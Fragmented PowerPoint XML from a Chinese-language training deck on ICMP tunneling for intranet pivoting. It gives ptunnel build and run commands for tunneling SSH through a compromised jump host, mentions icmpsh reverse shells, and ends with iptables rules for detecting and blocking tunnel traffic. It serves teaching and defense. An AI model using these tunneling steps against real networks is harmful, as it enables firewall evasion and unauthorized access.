              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>隧道专用工具 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ptunnel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ICMPSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>常用于直接反弹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ptunnel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>采用的是隧道中转，因此需要内网存在一个跳板机</a:t>
            </a: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同样，它需要把自身的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>响应关闭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0182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4" y="779662"/>
            <a:ext cx="7706088" cy="33936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dirty="0" err="1"/>
              <a:t>ptunnel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>自带）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                                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3B1D15-764B-154D-B843-CF5D41B2438B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4538822" y="1720645"/>
            <a:ext cx="4460488" cy="1734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假设攻击者已经控制了目标网络的一台边界机，它的内外网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分别为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172.16.237.4\192.168.152.116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（模拟公网和局域网）的内网服务器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但现在黑客想通过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，控制内网的另一台服务器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server2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76169FBC-FABF-204F-843D-AAE92584A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580" y="425450"/>
            <a:ext cx="6045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572B3-0C87-4EA7-9196-73FC8D16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73DD4-59B9-458B-9AC5-2636392E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6" y="866776"/>
            <a:ext cx="7706088" cy="47624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利用过程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9F7EC8-306F-2647-812F-4A2698D12551}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1062037" y="1357589"/>
            <a:ext cx="7591426" cy="9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内网跳板机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Server1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上传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ptunnel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，作为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ptunnel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的服务端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在自己的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vps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上编译并部署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Ptunnel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kali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2BA4BC96-9D94-9D49-B812-E1480586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63" y="1921691"/>
            <a:ext cx="4739374" cy="33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5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0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0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615" y="1025925"/>
            <a:ext cx="7706088" cy="19458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通过 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>隧道连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Ptunnel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跳板机安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ptunnel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clone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https://github.com/f1vefour/ptunnel.git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安装步骤：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4876B2-2121-E94D-9262-65490CAF3D1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1816866" y="2971801"/>
            <a:ext cx="5510267" cy="458908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进入到目录，安装：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make &amp;&amp; make install</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="395697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0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0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615" y="866775"/>
            <a:ext cx="7706088" cy="194587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通过 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>隧道连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Ptunnel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）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跳板机上使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ptunnel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>centos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>上开启隧道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使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>选项给隧道设置密码，以避免隧道被滥用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4876B2-2121-E94D-9262-65490CAF3D1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2800279" y="1923196"/>
            <a:ext cx="3564759" cy="458908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sudo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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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ptunnel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–x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 Light" charset="-122"/>
              </a:rPr>
              <a:t> 密码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  <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
            </a:endParaRP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2E275CC6-BC1D-AF49-B1D7-E23E7A316EAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="1354" t="4154" r="6207" b="11733"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1947862" y="3228515"/>
            <a:ext cx="5248275" cy="14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0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0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149B06-2A4A-4DA6-8F40-86410DBEE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615" y="866775"/>
            <a:ext cx="7706088" cy="385762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cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>通过 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t> 隧道连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>Ptunnel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a: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在攻击机上：</a:t>
            </a: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dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>、将自身的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>响应关闭</a:t>
            </a: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dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>、转发指定端口</a:t>
            </a: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pPr marL="540000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pP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US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>ptunnel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t> -p 192.168.152.116 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>lp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t> 6666 -da 172.16.237.5 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>dp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t> 22 -x 123.com (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122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6A874-A0D3-2241-9E2E-DCE97E6AAB7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291633" y="2727174"/>
            <a:ext cx="8582052" cy="832151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altLang="zh-CN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GB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sysctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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-w net.ipv4.icmp_echo_ignore_all=1    //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关闭系统的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN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icmp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应答，恢复设置为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>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN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en-GB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ptunnel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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 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跳板</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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GB" altLang="zh-CN" sz="13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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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指定本地的监听端口 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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GB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 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受害机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN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en-GB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GB" altLang="zh-CN" sz="13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GB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受害机的端口 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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GB" altLang="zh-CN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GB" altLang="zh-CN" sz="1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指定连接的验证密码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1106077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0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0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1E01222-C5DC-9445-BD64-6D55427B8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8" b="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1545753"/>
            <a:ext cx="7924800" cy="20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4F806-92F7-46C2-81BE-E9AB0B2A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0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0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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="电脑屏幕的截图&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDBCCDDA-F9C5-E345-B7FA-E49BA23DD3D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="1698" t="1137" r="2116" b="2325"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2507932" y="941025"/>
            <a:ext cx="4128135" cy="34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68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572B3-0C87-4EA7-9196-73FC8D16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400" dirty="0">
                <a:ln w="0"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r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隧道工具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73DD4-59B9-458B-9AC5-2636392E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297" y="762697"/>
            <a:ext cx="7706088" cy="28942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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>总结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① 跳板机和攻击机之间是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包通信，已成功进行流量隐藏。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② 跳板机和受害机之间是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据包通信，即真正的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>连接是跳板机和受害机，攻击机和跳板机之间只是数据的转发而已（包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>连接命令）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3E568C-AD6F-FD49-93B7-4B7DF6DA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98" y="1869821"/>
            <a:ext cx="4254604" cy="17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3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B0257-535B-4FAD-8B88-B28BFD3B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C2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>隧道的概念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C4F01-F801-4D46-A440-075F11F97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内网穿透原理：利用各种隧道技术，以及网络防火墙允许的协议，绕过网络防火墙的封锁，实现访问被封锁的目标网络。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02053B-4F12-2040-B7AC-5FC59A76B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" t="3225" r="1818" b="4320"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="937027" y="1943122"/>
            <a:ext cx="7291264" cy="21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78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572B3-0C87-4EA7-9196-73FC8D16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防御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73DD4-59B9-458B-9AC5-2636392E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420" y="991961"/>
            <a:ext cx="8011160" cy="3607253"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750"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ICMP tunnel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的流量特征明显，它把非法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>流量隐藏在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>echo-request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>echo-reply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>数据包的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>中，使数据包的内容及长度都发生改变。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" font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如果想防御</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>隧道，可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>禁止</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP tunnel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>流量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，思路：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="900000" indent="-342900" font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/>
              <a:t>禁止</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="900000" indent="-342900" font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/>
              <a:t>只要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不是标准的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 err="1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data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包的标准内容，则判定非法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="900000" indent="-342900" font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dirty="0"/>
              <a:t>不是标准的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 err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包的长度，也可以判定非法</a:t>
            </a:r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FCE84407-843F-B345-867B-7C1D0684B2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650" y="27955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918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572B3-0C87-4EA7-9196-73FC8D16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n w="0"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>防御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673DD4-59B9-458B-9AC5-2636392EF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615" y="866776"/>
            <a:ext cx="8054931" cy="3933824"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>防火墙策略</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>-A INPUT -p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-m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-type 0 -m string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--hex-string "|0000000000101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f3031323334353637|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>" --algo bm --to 65535 -j ACCEPT</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>-A INPUT -p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-m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-type 0 -m string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>abcdefghijklmnopqrstuvwabcdefghi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>" --algo bm --to 65535 -j ACCEPT</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>-A INPUT -p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-m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-type 8 -m string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--hex-string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>"|0000000000101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f3031323334353637|" --algo bm --to 65535 -j ACCEPT</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>-A INPUT -p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-m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-type -m string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>abcdefghijklmnopqrstuvwabcdefghi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>" --algo bm --to 65535 -j ACCEPT</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>-A INPUT -p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-m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-type 8 -j DROP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>-A INPUT -p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-m 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 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>-type 0 -j DROP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="AutoShape 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCE84407-843F-B345-867B-7C1D0684B2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650" y="27955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01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5760" y="2452370"/>
            <a:ext cx="5626100" cy="73914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完结</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN"/>
            </a:br>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US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B0257-535B-4FAD-8B88-B28BFD3B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C2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>隧道的概念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FC4F01-F801-4D46-A440-075F11F97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956" y="866775"/>
            <a:ext cx="7706088" cy="2894203"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>将隧道技术按所处的协议层分层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A8DA342-AAD4-EF41-9C88-DFCB6F7925BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1004706" y="1425567"/>
            <a:ext cx="7706088" cy="3088107"/>
            <a:chOff x="1151754" y="1453920"/>
            <a:chExt cx="7706088" cy="3088107"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="图片 5" descr="文本, 信件&#10;&#10;描述已自动生成">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2947640F-3581-8B48-B430-A32321A9E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754" y="1453920"/>
              <a:ext cx="4386695" cy="308810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299425B-FD08-7D4B-9E76-4C87852E0B44}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5741580" y="3254616"/>
              <a:ext cx="1658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ICMP</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1"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隧道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68346AA-A684-B444-A834-D20F6DFEFF1C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5713228" y="2813307"/>
              <a:ext cx="259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TCP</a:t>
              </a:r>
              <a:r>
